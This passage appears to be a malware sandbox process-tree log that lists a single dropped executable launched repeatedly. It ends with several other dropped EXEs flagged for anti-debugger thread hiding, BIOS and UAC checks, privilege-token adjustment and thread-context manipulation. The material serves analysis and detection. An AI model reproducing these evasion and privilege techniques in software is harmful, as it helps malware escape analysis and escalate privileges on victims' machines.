    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:16556
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:20628
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:20776
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:19240
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:7332
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:19932
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:21900
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22220
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:21136
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:21748
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22192
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22356
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22444
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:17672
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:15916
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:16508
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14456
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:12476
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22552
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22976
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:23376
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22888
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:23008
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:23164
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:23676
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:23964
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:24356
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22156
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:8692
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:24468
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:24012
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:12060
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:24600
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:25080
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:25528
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22044
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22704
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:24284
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22744
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:24764
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:25500
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:25732
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:26108
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:26380
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:23092
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:26028
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:26204
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:25012
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:25424
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:19948
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:25560
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22548
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:27024
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:27548
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14928
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:27428
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:27104
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:27608
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:19076
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:25820
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:9904
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:5336
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22392
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:28016
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:28584
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14760
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:27988
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:28608
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:27940
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:18860
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:11108
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:27788
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:11072
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:24032
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:4936
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:10776
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:26308
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:19688
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:24916
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:28188
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:11172
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:7620
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:28796
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:29240
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:29664
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14924
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:15908
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:29168
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:12596
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22756
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:24328
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:30196
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:22088
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:24824
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:29808
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:30904
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:31208
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:31492
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:30280
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:30808
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14028
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:31392
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:31260
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:31452
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:24560
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:31732
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:30848
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:30628
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:12620
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:32144
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:32592
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:32104
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:32408
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6388
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:31520
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:32120
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:11996
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14144
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6588
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:32128
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:32720
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:17820
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:31516
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:32304
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:25056
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:12204
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14372
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:15812
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:31804
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:20700
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:31296
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:32400
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:5100
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6448
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:33216
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:33512
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:32496
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:33132
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:33280
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:28892
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:33368
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:32864
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:32992
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:32064
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:33232
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:33164
- C:\Users\Admin\Documents\BmVjX7KCVfl4a2Mg6TfE5dd2.exe
  "C:\Users\Admin\Documents\BmVjX7KCVfl4a2Mg6TfE5dd2.exe"
  2⤵
  - Executes dropped EXE
  PID:3912
- C:\Users\Admin\Documents\C32G6hsqdyB5xZXRrZkAN2pC.exe
  "C:\Users\Admin\Documents\C32G6hsqdyB5xZXRrZkAN2pC.exe"
  2⤵
  - Executes dropped EXE
  PID:3996
- C:\Users\Admin\Documents\KzCxmMJHhCNMmLclOnkcLmqy.exe
  "C:\Users\Admin\Documents\KzCxmMJHhCNMmLclOnkcLmqy.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:1124
- C:\Users\Admin\Documents\izHeEhUhzM57UzU61LVUHiyK.exe
  "C:\Users\Admin\Documents\izHeEhUhzM57UzU61LVUHiyK.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of AdjustPrivilegeToken
  PID:3836
- C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe
  "C:\Users\Admin\Documents\nEY1yGXSpSN1aQEspYCrm9J1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1048
